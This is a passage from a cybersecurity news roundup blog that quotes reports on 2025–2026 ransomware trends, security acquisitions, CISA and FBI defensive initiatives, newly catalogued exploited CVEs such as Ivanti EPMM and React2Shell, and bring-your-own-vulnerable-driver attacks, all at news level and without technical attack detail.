    • “The real issue is simpler and more serious: phones running Android 12 or older are now outside the security safety net.”

From the ransomware front,

  • The HIPAA Journal reports,
    • “A new record was set for ransomware attacks last year, with disclosed ransomware attacks increasing by 49% year-over-year to a record-high of 1,174 attacks, according to Black Fog’s 2025 State of Ransomware Report. There was also a 37% year-over-year increase in undisclosed attacks, with 7,079 victims added to dark web data leak sites in 2025. The figures indicate that globally, 86% of ransomware attacks are not disclosed by victims.
    • “Data theft almost always occurs with ransomware attacks. In 2025, 96% of attacks involved data exfiltration prior to file encryption, which results in greater organizational harm. Data exfiltration has contributed to the significant increase in breach costs, as data theft results in greater reputational harm and increased regulatory exposure. In 2025, the average cost of a data breach was $4.44 million globally, and $7.42 million for healthcare data breaches. Healthcare retained its position as the sector most targeted by ransomware groups in 2025, accounting for 22% of disclosed attacks. All sectors experienced an increase in attacks in 2025, apart from education, which saw a 13% year-over-year decrease in attacks.
    • “The breakup of large ransomware groups has led to a fragmentation of the ransomware ecosystem, and the number of active ransomware groups continued to increase in 2025. Black Fog tracked 130 different ransomware groups in 2025, of which 52 were new groups that emerged in 2025, a 9% increase from 2024. Several groups that emerged in 2025 have disproportionately targeted the healthcare sector, including Sinobi, Insomnia, and Devman. Devman issued the largest ever ransom demand of $91 million in 2025 for its attack on China’s real estate development company Shimao Group Holdings. World Leaks, widely believed to be a rebrand of Hunters International, has also claimed several healthcare victims, as have all of the top three most prolific and dangerous ransomware groups of the year: Qilin, Akira & Play.”
  • Cybersecurity Dive adds,
    • “Ransomware attacks on the IT sector were higher in each quarter of 2025 than in the same quarters of 2024, with the sector ranking third behind manufacturing and commercial facilities on hackers’ target lists, according to a new report from the Information Technology Information Sharing and Analysis Center.
    • “Nearly half of all ransomware attacks that the IT-ISAC tracked occurred in the U.S., far surpassing the totals in other countries.
    • “The food and agriculture sector also saw a significantly higher number of ransomware attacks in 2025 than it did in 2024, according to a new report from that sector’s ISAC, which shares leadership with the IT-ISAC.”
  • The Federal Trade Commission has issued its own 2025 ransomware report according to Executivegov.
    • “The Federal Trade Commission has reported that ransomware and other malware-based attacks represent only 2.23 percent of all fraud complaints submitted to the agency.
    • “In the 2025 Ransomware Report published Friday, the FTC shared that, between July 2023 and June 2025, tech support scams were among the most reported fraud types.
    • “About 1 percent of the 42,972 reports the FTC received that allegedly originate from China are ransomware. The majority of the complaints are related to online shopping fraud.
    • “Complaints tied to Russia, Iran and North Korea are relatively rare, with the three countries accounting for only 0.05 percent of all fraud reports the FTC received from 2023 to 2025.”
  • Morphisec calls attention to
    • “Ransomware isn’t slowing down. It’s scaling, adapting, and finding new ways to slip past defenses that many organizations still trust implicitly.  
    • “The Ransomware Reality Check 2026 infographic paints a clear, data-driven picture of the risk landscape ahead: from skyrocketing demands to sophisticated execution methods that beat traditional detection technologies.”  
  • Per Security Week,
    • “Mere data exfiltration is no longer a lucrative approach for ransomware groups, and threat actors may increasingly rely on encryption to regain leverage, Coveware notes in a new report.
    • “Following a series of highly successful data-exfiltration-only attacks conducted by known groups such as Cl0p, other ransomware groups adopted the trend, stealing victims’ data without encrypting it.
    • “The campaigns targeting MOVEitCleo, and Oracle E-Business Suite (EBS) customers are proof that the approach no longer delivers return on investment, Coveware says.
    • Cl0p, it explains, started this trend with a simple strategy: it acquired an exploit for a zero-day vulnerability in a popular enterprise file transfer or data storage product, hacked as many instances as possible for data exfiltration, and extorted each compromised entity into paying a ransom.
    • I”n 2021, the group likely made tens of millions of dollars using this tactic in the Accellion campaign, when over 25% of the impacted organizations likely paid a ransom. Roughly 20% of the entities impacted by the GoAnywhere MFT hack also paid a ransom.
    • “In the subsequent campaigns, however, the victims’ willingness to pay dropped significantly: less than 2.5% of those affected by the MOVEit breach paid, and almost none paid in the Cleo and Oracle EBS incidents, Coveware says in its latest ransomware trends report.”
  • Per Cyberscoop,
    • “Ransomware groups crop up like weeds, angling for striking positions in a crowded field rife with turnover, infighting and unbridled competition. Yet, they rarely emerge, as 0APT did late last month, claiming roughly 200 victims out of the gate.
    • “Researchers have thus far seen no evidence confirming 0APT attacked any of its alleged victims, which includes high-profile organizations. Alleged victim data samples and the structure and size of placeholder file trees published by 0APT place further doubt on the group’s supposed criminal escapades. 
    • “Most signs suggest the group is running a massive hoax, but at least some of the threat 0APT poses is grounded in truth. The group’s inflated pretense may be a ruse to create a sense of momentum, gain recognition and attract affiliates.
    • “While 0APT is probably bluffing about the victims it has already compromised, it is not bluffing on the technical capabilities of its actual ransomware,” Cynthia Kaiser, senior vice president at Halcyon’s ransomware research center, told CyberScoop.”

From the cybersecurity business and defenses front,

  • The Wall Street Journal reports,
    • The European Union approved Google’s $32 billion acquisition of cybersecurity startup Wiz, a win for the Alphabet unit’s GOOGL  * * *
    • “Google announced the all-cash deal in March 2025, betting that bringing Wiz under its cloud business would help it fast-track improvements in cloud security and enhance its ability to use multiple clouds, both trends that have gathered pace in the artificial-intelligence era.
    • “Wiz provides cybersecurity software for cloud computing and has presences in New York; Arlington, Virginia; London and Tel Aviv.
    • “The deal—cleared by U.S. antitrust authorities in November last year—was flagged to the EU’s merger watchdog for screening in January.”
  • Cyberscoop relates,
    • “Proofpoint announced Thursday [February 12] it has acquired Acuvity, an AI security startup, as the cybersecurity company moves to address security risks stemming from widespread corporate adoption of agentic AI.
    • “The acquisition strengthens Proofpoint‘s capabilities in monitoring and securing AI-powered systems that are increasingly handling sensitive business functions across enterprises. 
    • “Financial terms of the deal were not disclosed, but Ryan Kalember, Proofpoint’s chief strategy officer, told CyberScoop that the acquisition was beyond a pure “technology acquisition,” with Acuvity’s engineering team slated to join the California-based company. 
    • “Acuvity specializes in visibility and governance for AI applications, including the ability to track how employees and automated systems interact with external AI services and protect custom AI models developed within organizations. The startup’s platform monitors AI usage across multiple deployments, from web browsers to specialized infrastructure including Model Context Protocol (MCP) servers and locally installed AI tools.”
  • Per a February 13 CISA news release,
    • “For years, CISA has responded to an unending wave of cyber incidents targeting edge devices embedded in the Nation’s federal networks and critical infrastructure. The common culprit? 
      • Unsupported hardware and software residing on the edge of organizational networks that vendors are no longer maintaining.
    • Nation-state adversaries have seized these weak points, exploiting them to gain unauthorized access, maintain persistence, and compromise sensitive data. These neglected devices are more than just vulnerabilities; they threaten the Nation’s security, privacy, and resilience. 
    • As the operational lead for federal cybersecurity, CISA recently took a large step toward addressing this systemic risk by issuing Binding Operational Directive (BOD) 26-02, a mandate for federal civilian agencies to identify and replace end-of-support (EOS) edge devices, stay current with software updates, and patch known vulnerabilities. While directed to federal agencies, we strongly encourage all organizations to adopt similar actions. 
    • However, we as a community can and must do more. Managing the lifecycles of hardware and software products can quickly become a daunting, resource-intensive task—especially without an efficient way to determine the EOS status for hardware and software. 
    • Enter OpenEoX: a machine-readable, international standard that transforms how product lifecycle information is exchanged across software, hardware, services, and AI models. By introducing much-needed standardization and automation, OpenEoX brings transparency, efficiency, and unity to asset management. By integrating OpenEoX across the community, both hardware and software producers and consumers can together turn the tide on one of the most serious cyber threats facing the Nation: EOS hardware and software.” * * *
    • Additional Resources
  • Meritalk relates,
    • The FBI Cyber Division’s latest initiative, Operation Winter SHIELD, is growing as more field offices join the cybersecurity defense campaign that aims to turn lessons from investigations into high-impact actions that organizations can take to strengthen their defenses. 
    • The bureau launched Operation Winter SHIELD on Jan. 28 as a two-month effort that spotlights one of 10 “high-impact actions” each week. The initiative is designed to help organizations reduce common breach pathways and harden critical infrastructure systems against nation-state and criminal cyber threats. 
    • Since its announcement, numerous FBI field offices across the nation have voiced their support for the operation – some of the latest field offices to join this week include SeattlePhiladelphia, and Anchorage
    • In a video announcement, FBI Cyber Division Assistant Director Brett Leatherman said the campaign distills insights from real-world investigations into practical steps that organizations can take immediately. 
    • “Every winter storms test our infrastructure. Power grids, water systems, and supply chains are pushed to their limits, but the most critical threats to infrastructure don’t come from the weather. They come through our networks,” Leatherman said. 
      • The 10 actions outlined by the FBI include: 
      • Adopt phish-resistant authentication 
      • Implement a risk-based vulnerability management program 
      • Track and retire end-of-life technology on a defined schedule 
      • Manage third-party risk 
      • Protect security logs and preserve them for an appropriate time period 
      • Maintain offline immutable backups and test restoration 
      • Identify, inventory, and protect internet-facing systems and services 
      • Strengthen email authentication and malicious content protections 
      • Reduce administrator privileges 
      • Exercise your incident response plan with all stakeholders 
  • Per Dark Reading,
    • “Microsoft Under Pressure to Bolster Defenses for BYOVD Attacks
    • “Threat actors are exploiting security gaps to weaponize Windows drivers and terminate security processes in targeted networks, and there may be no easy fixes in sight.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI, Uncategorized

From the cybersecurity policy front,

  • The Wall Street Journal reports,
    • “After months of partisan wrangling, a temporary extension on Tuesday of legislation aimed at encouraging firms to share cyberattack intelligence with Washington might be too little, too late for corporate cybersecurity leaders. 
    • “The seesaw effect we saw last year has eroded the trust that intel sharing needs to be built on,” said Timothy Youngblood, an investor who led cybersecurity teams at T-MobileMcDonald’s and Kimberly-Clark. Before providing sensitive details of a data breach or ransomware attack, companies need to be assured “they will not have the information used against them,” Youngblood said.
    • “The Cybersecurity Information Sharing Act, or CISA, provides liability and antitrust protections for companies that share attack data with federal agencies. Created in 2015 with a 10-year sunset clause, the act lapsed twice over the past four months as lawmakers clashed over proposed revisions. It was extended this week [to September 30, 2026] as part of a broader spending bill approved by Congress and signed by President Trump.  
    • “But an eight-month shelf life—and on-again off-again status—is unlikely to encourage hacked companies to risk legal or reputational damage by sharing sensitive data, especially in the wake of costly downtime, cybersecurity experts said. Staffing and resource cuts over the past year at the federal Cybersecurity and Infrastructure Security Agency, which shepherds private-public intelligence sharing, is adding to their concerns, they said.
    • “Temporary extensions are Band-Aids,” said Kevin Greene, public sector chief cybersecurity technologist at security firm BeyondTrust. Prolonged uncertainties, he said, will “absolutely create some friction in information sharing.”
  • Cyberscoop relates,
    • “The Trump administration needs help from industry to reduce the cybersecurity regulatory burden and to back important cyber legislation on Capitol Hill, among other areas, National Cyber Director Sean Cairncross said Tuesday.
    • “You know your regulatory scheme better than I do: Where there’s friction, where there’s frustration with information sharing, what sort of information is shared, the process through which it’s shared,” he said. “It is helpful for us to hear that and have that feedback so that we can address it, engage it and try to make it better.”
    • “The Trump administration is interested in being a partner with industry rather than a “scold,” Cairncross said at an Information Technology Industry Council event. The Biden administration sought to impose more cybersecurity rules on the private sector than prior administrations.”
  • Cybersecurity Dive adds,
    • “Cairncross’s comments come as the White House prepares to unveil its five-page national cybersecurity strategy, which will focus heavily on streamlining regulations to reduce the burden on industry, including critical infrastructure organizations.
    • “The White House wants to revise the current patchwork of cybersecurity regulations “so that form follows function rather than [the rules being] a compliance checklist,” said Cairncross, who has led the relatively new Office of the National Cyber Director since August.” * * *
    • “Cairncross did not provide a timeline for the strategy’s release, but he said the White House would publish it “sooner rather than later.” The goal of the brief document, he explained, is “to point a direction for the USG to go so resources and effort can be lined up.”
  • and
    • “Governments should work closely with the private sector when designing and detailing their national cybersecurity strategies, a prominent think tank said in a report published on Monday.
    • “Active participation from the private sector, particularly large technology, telecommunications, and cybersecurity firms, is critical throughout the strategy’s development,” the Center for Cybersecurity Policy and Law (CCPL) said in its white paper. “The private sector can help not only support but also deliver on the government’s cybersecurity objectives and is key to a secure and resilient nation.”
  • and
    • “The Trump administration is making progress on creating an information sharing and analysis center for the AI industry to improve its ties with the government as AI cyber threats proliferate, a U.S. official said on Tuesday.
    • “The administration is absolutely committed to making sure that we’re supporting this industry, making sure that we’re going to foster information sharing,” Nick Andersen, executive assistant director for cybersecurity at the Cybersecurity and Infrastructure Security Agency, said during a talk at an event hosted by the Information Technology Industry Council. “We just want to make sure we take the opportunity to get that relationship right.”
  • Federal News Network shares five updates on the Trump Administration’s cybersecurity agenda.
    • Six-pillar national cyber strategy
    • CIRCIA update
    • AI-ISAC in development
    • AI security policy framework
    • CIPAC replacement coming soon?
  • DefenseScoop notes,
    • “Marine Corps Maj. Gen. Lorna Mahlock was confirmed by the Senate on Friday evening [January 30] as deputy commander of U.S. Cyber Command, where she could have an outsized influence as the organization prepares for new leadership and other major changes.
    • “She was nominated for the position by President Donald Trump.
    • “Her Senate confirmation, which happened via voice vote, means she’ll also pin on a third star and become a lieutenant general.
    • “Mahlock brings deep cyber knowledge and background to her new role.”
  • Per Cybersecurity Dive,
    • “The Federal Communications Commission is warning telecommunications companies to regularly patch their systems, enable multifactor authentication and segment their networks to avoid falling victim to ransomware attacks.
    • “Recent events show that some U.S. communications networks are vulnerable to cyber exploits that may pose significant risks to national security, public safety, and business operations,” the FCC’s Public Safety and Homeland Security Bureau said in a Jan. 29 alert.”

From the cybersecurity vulnerabilities and breaches front.

  • Cyberscoop reports,
    • “Cybersecurity and Infrastructure Security Agency order published Thursday [February 4, 2026] directs federal agencies to stop using “edge devices” like firewalls and routers that their manufacturers no longer support.
    • “It’s a stab at tackling one of the most persistent and difficult-to-manage avenues of attack for hackers, a vector that has factored into some of the most consequential and most common types of exploits in recent years. New edge-device vulnerabilities surface frequently.
    • “Under the binding operational directive CISA released Thursday, federal civilian executive branch (FCEB) agencies must inventory edge devices in their systems that vendors no longer support within three months, and replace those on a dedicated list with supported devices within one year.”
  • The American Hospital Association News tells us,
    • “The National Institute of Standards and Technology Feb. 2 published details on a critical vulnerability that impacted Notepad++, a free, open-source text and source code program widely used by several industries, including health care. The vulnerability impacted an update component affecting iterations of the program prior to version 8.8.9, and allowed attackers to gaining access to and disrupt the update process. According to the program’s developer, attacks that occurred from June to November 2025 were likely executed by a sophisticated nation-state threat actor.”
  • Cybersecurity Dive informs us,
    • “Cybercrime “began its shift toward an AI-driven future” in 2025, the security firm Malwarebytes said in a report published Tuesday that charted AI’s influence on the rapidly growing hacking ecosystem.
    • “AI is making cyberattacks faster and more effective through deepfakes, vulnerability discovery, autonomous ransomware attacks and growing connectivity between AI models and penetration testing tools, according to the report.
    • “Malwarebytes urged businesses to “shrink their attack surfaces, harden identity systems, close blind spots, accelerate remediation, and adopt continuous monitoring.”
  • and
    • “Hackers working for an Asian government have breached at least 70 government agencies and critical infrastructure organizations in 37 countries over the past year as part of an espionage campaign likely aimed at collecting information about rare earth minerals, trade deals and economic partnerships, Palo Alto Networks said in a reportpublished on Thursday.
    • “While this group might be pursuing espionage objectives,” researchers with the company’s Unit 42 group wrote in the report, “its methods, targets and scale of operations are alarming, with potential long-term consequences for national security and key services.”
    • “The security firm provided indicators of compromise and described the threat actor’s techniques and infrastructure.”
  • CISA added six known exploited vulnerabilities to its catalog this week.
    • February 3, 2026
      • CVE-2021-39935 GitLab Community and Enterprise Editions Server-Side Request Forgery (SSRF) Vulnerability
        • Cyber Press discusses this KVE here.
      • CVE-2025-40551 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
        • Cybersecurity Dive discusses this KVE here.
      • CVE-2019-19006 Sangoma FreePBX Improper Authentication Vulnerability
      • CVE-2025-64328 Sangoma FreePBX OS Command Injection Vulnerability 
        • The Hacker News discusses these KVEs here.
    • February 5, 2026
      • CVE-2025-11953 React Native Community CLI OS Command Injection Vulnerability
        • Security Wek discusses this KVE here.
      • CVE-2026-24423 SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability
        • Bleeping Computer discusses this KVE here.
  • Dark Reading points out, “CISA Makes Unpublicized Ransomware Updates to KEV Catalog
    • “A third of the “flipped” CVEs affected network edge devices, leading one researcher to conclude, ‘Ransomware operators are building playbooks around your perimeter.'”
  • Cyberscoop adds,
    • “Attackers are again focusing on a familiar target in the network edge space, actively exploiting two critical zero-day vulnerabilities in Ivanti software that allows administrators to set mobile device and application controls. 
    • “The vulnerabilities — CVE-2026-1281 and CVE-2026-1340 — each carry a CVSS rating of 9.8 and allow unauthenticated users to execute code remotely in Ivanti Endpoint Manager Mobile (EPMM). Ivanti did not say when the earliest known date of exploitation occurred but warned that a “very limited number of customers” were attacked before it disclosed and addressed the defects Thursday [January 29, 2026]. * * *
    • “The Cybersecurity and Infrastructure Security Agency has flagged 31 Ivanti defects on its known exploited vulnerabilities catalog since late 2021. At least 19 defects across Ivanti products have been exploited in the past two years. 
    • “The agency added CVE-2026-1281 to the catalog Thursday, but not CVE-2026-1340. Both defects have been exploited, according to watchTowr. Yet, a spokesperson for Ivanti said the vulnerabilities have not been chained together for exploitation.
    • “The latest code-injection vulnerabilities demonstrate attackers are focusing on EPMM in particular of late. Ivanti disclosed a separate pair of vulnerabilities in the same product in May 2025.” 
  • Cybersecurity Dive informs us,
    • “Two months after a critical vulnerability was disclosed in React Server Components, researchers warn of a significant change in threat activity targeting the flaw. 
    • “The original vulnerability, tracked as CVE-2025-55182, allows an unauthenticated attacker to achieve remote code execution due to unsafe deserialization of payloads. 
    • “The initial wave of attacks in December led to hundreds of systems being compromised as state-linked threat groups and other actors engaged in widespread exploitation. The vulnerability, dubbed React2Shell, has been targeted in a wide range of industries since it was discovered in late November.
    • “Researchers from GreyNoise on Monday reported a distinctive change over the prior seven days, as more than half of the threat activity now emanated from only two IP addresses, according to a blog post. Before the change, there were 1,083 unique sources linked to threat activity, according to researchers.
    • “GreyNoise said its sensors detected more than 1.4 million attempts to exploit CVE-2025-55182 during the seven-day period.
    • “Researchers warned the exploitation appears to be focused on the developer community.” 
  • Per Dark Reading,
    • “Threat actors are using a forensic tool’s Windows kernel driver to kill security products, despite the fact the driver’s digital certificate was revoked more than a decade ago.
    • “In a blog post Wednesday, security researchers at Huntress detailed how the company responded to an intrusion earlier this month in which the threat actor used compromised SonicWall SSL VPN credentials for initial access to the victim’s network. But the real kicker was how the attacker avoided detection: they weaponized the Windows kernel driver of a legitimate forensic toolset called EnCase to disable security products across the network.”
    • “The attack technique is known as bring-your-own-vulnerable-driver (BYOVD), which involves taking advantage of the elevated privileges and kernel-level access of a driver to terminate security processes before an intrusion is detected. Threat actors have increasingly used drivers to disable endpoint detection and response (EDR) platforms, often in ransomware attacks; these tools are commonly known as EDR killers.”  
  • Per SC Media,
    • “More than 300 malicious OpenClaw skills hosted on ClawHub spread malware including the Atomic macOS Stealer (AMOS), keyloggers and backdoors, Koi Security reported Sunday.  
    • OpenClaw, formerly known as Moltbot and Clawdbot, is an open-source AI agent that has recently gained significant popularity as a personal and professional assistant.
    • “ClawHub is an open-source marketplace for OpenClaw “skills,” which are tools OpenClaw agents can install to enable new capabilities or integrations.
    • “Koi Security Researcher Oren Yomtov discovered the malicious skills in collaboration with his own OpenClaw assistant named Alex, according to Koi Security’s blog post, which is written from Alex’s perspective.
    • “Yomtov and Alex audited all 2,857 skills available on ClawHub at the time of their investigation, and discovered that 341 were malicious, with 335 seemingly tied to the same campaign.”
  • Per Security Week,
    • “The big takeaway from 2026 onward is the arrival and increasingly effective use of AI, and especially agentic AI, that will revolutionize the attack scenario. The only question is how quickly.
    • ‘Michael Freeman, head of threat intelligence at Armis, predicts, “By mid-2026, at least one major global enterprise will fall to a breach caused or significantly advanced by a fully autonomous agentic AI system.”
    • “These systems, he continues, “use reinforcement learning and multi-agent coordination to autonomously plan, adapt, and execute an entire attack lifecycle: from reconnaissance and payload generation to lateral movement and exfiltration. They continuously adjust their approach based on real-time feedback. A single operator will now be able to simply point a swarm of agents at a target.”

From the ransomware front,

  • Bleeping Computer reports today,
    • “A major U.S. payment gateway and solutions provider says a ransomware attack has knocked key systems offline, triggering a widespread outage affecting multiple services.” * * *
    • “BridgePay Network Solutions confirmed late Friday that the incident disrupting its payment gateway was caused by ransomware.
    • “In an update posted Feb. 6, the company said it has engaged federal law enforcement, including the FBI and U.S. Secret Service, along with external forensic and recovery teams.
    • “Initial forensic findings indicate that no payment card data has been compromised,” the company said, adding that any accessed files were encrypted and that there is currently “no evidence of usable data exposure.”
  • The Rhode Island Current tells us,
    • “A state vendor and major provider of workers’ compensation insurance in Rhode Island confirmed it was the victim of a cyberattack in January.   
    • “The Beacon Mutual Insurance Company posted about the Jan. 14 incident to its website around noon Thursday, following inquiries from Rhode Island Current earlier in the day. The requests for comment were prompted by Beacon’s appearance on public websites that list and track recent reports of ransomware — a genre of malware characterized by making users’ files encrypted and inaccessible unless they pay a price.
    • “Yes, this was a ransomware attack,” Michelle N. Pelletier, the assistant vice president of marketing and communications at the Warwick company, confirmed over email late Thursday afternoon.
    • “But Pelletier added that not all was lost, and that the company’s production environment — or the live systems that users interact with directly — remained safe from harm.  
    • “Fortunately, our production environment was not encrypted, and we were able to resume normal operations on January 20,” Pelletier wrote.”  
  • Security points out,
    • “If battling ransomware isn’t challenging enough, these attacks have undergone a significant metamorphosis, with attackers shedding their encryption-based model for one of pure exfiltration. The result? A more stealthy, discreet approach that successfully bypasses traditional defenses to snatch sensitive data and employ a double or triple extortion scheme. 
    • “With pure exfiltration, businesses don’t realize they’re a victim until it’s too late.” 
  • Security Week adds,
    • “Data allegedly pertaining to over 5 million Panera Bread customers has emerged online after hackers failed to extort the US bakery-cafe chain.
    • “The ShinyHunters extortion group has claimed the theft of roughly 14 million records from Panera Bread, after compromising a Microsoft Entra single-sign-on (SSO) code.
    • “The attack falls in line with recent ShinyHunters attacks that rely on voice phishing (vishing) and SSO authentication to access victim organizations’ cloud-based software-as-a-service (SaaS) environments.
    • “Last week, ShinyHunters published on its Tor-based leak site a 760GB archive allegedly containing the sensitive information stolen from Panera Bread.
    • “According to the data breach notification site Have I Been Pwned, the data was leaked after the hackers failed to extort the food chain.
    • “The archive includes 5.1 million unique email addresses and likely impacts as many Panera customers. Associated information such as names, addresses and phone numbers was also present in the leak.”
  • Security.com lets us know,
    • “A recent Black Basta attack campaign was notable because the ransomware contained a bring-your-own-vulnerable-driver (BYOVD) defense evasion component embedded within the ransomware payload itself.
    • “Normally the BYOVD defense evasion component of an attack would involve a distinct tool that would be deployed on the system prior to the ransomware payload in order to disable security software. However, in this attack, the vulnerable driver (an NsecSoft NSecKrnl driver) was bundled with the ransomware itself. 
    • “BYOVD is by far the most frequently used technique for defense impairment these days. Generally, attackers will deploy a signed vulnerable driver to the target network, which they then exploit to elevate privileges and disable security software. Since the vulnerable drivers operate with kernel-mode access, they can be used to terminate processes, making them an effective tool for disrupting security measures. In most cases, the vulnerable driver is deployed along with a malicious executable, which will use the driver to issue commands.”
  • Bleeping Computer relates,
    • “Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider.
    • “Researchers at cybersecurity company Sophos observed the tactic while investigating recent ‘WantToCry’ ransomware incidents. They found the attackers used Windows VMs with identical hostnames, suggesting default templates generated by ISPsystem’s VMmanager.
    • “Diving deeper, the researchers discovered that the same hostnames were present in the infrastructure of multiple ransomware operators, including LockBit, Qilin, Conti, BlackCat/ALPHV, and Ursnif, as well as various malware campaigns involving RedLine and Lummar info-stealers.”
  • Per Dark Reading,
    • “The operators of DragonForce, a ransomware-as-a-service outfit that first surfaced in 2023, appear to be drawing heavily from the organized crime playbook, creating a cartel and attempting to bring mafia-style territorial organization — and a bit of muscle — to the ransomware ecosystem.
    • “A detailed analysis by LevelBlue showed the group has recently shifted its business model to one where customers — or affiliates — of its service can create their own brands while still operating under a blossoming DragonForce cartel umbrella.” * * *
    • DragonForce has established itself as a relatively major player in the ransomware ecosystem since launching activities in 2023. Though not as big as rivals like Akira and Qilin, it has commanded some attention for its aggressive marketing and outreach. As of July 2025, the company had notched at least 250 victims based on its data leak site, according to Check Point Research.”

From the cybersecurity defenses front,

  • Cyberscoop reports,
    • “Following a series of high-profile cyberattacks, boards of directors are now requiring their organizations to take greater responsibility for the risks posed by enterprise resource planning (ERP) systems pose after a series of high-profile cyberattacks. The Jaguar Land Rover (JLR), incident in Sept. 2025 illustrates the severe consequences of such attacks. The cyberattack forced JLR to halt production for six weeks, making it the costliest cyberattack in Britain’s history. The company’s revenue declined 24 percent that quarter, accounting for potentially over a  $1.2 billion drop in earnings, and subsequently reported a 43.3% wholesale sales volume drop the following quarter.
    • “For decades, organizations have treated ERP systems like SAP as back-office workhorses. However, the JLR incident—carried out by executed by the cybercrime group ShinyHunters —has thrust ERP systems into the spotlight. That shift in attention is critical: today, 90% of the Fortune 500 use SAP, making these systems “crown jewel” assets that require the highest level of protection.
    • “The threat is escalating. A recent Google Cloud Security report forecasts that ransomware operations specifically designed to target critical enterprise applications such as ERP systems will emerge in 2026, forcing organizations to make quick ransom payments and sacrifice business resilience. 
    • “In our roles as board members, advisers, and cybersecurity CEOs, we’re witnessing a fundamental shift in how organizations approach ERP security: the conversation has moved from compliance to survival. Organizations are grappling with critical question: Who owns the risk? What is our recovery time? Can we patch critical ERP vulnerabilities within 72 hours? Do we have visibility inside the application?”
  • Help Net Security explains where NSA zero trust guidance aligns with enterprise reality.
  • This HHS Inspector General’s report points out “Security Controls to Enhance Its Ability to Prevent and Detect Cyberattacks.”
  • Tech Target describes “five steps to ensure HIPAA compliance on mobile devices.”
  • Here is a link to Dark Reading’s CISO Corner.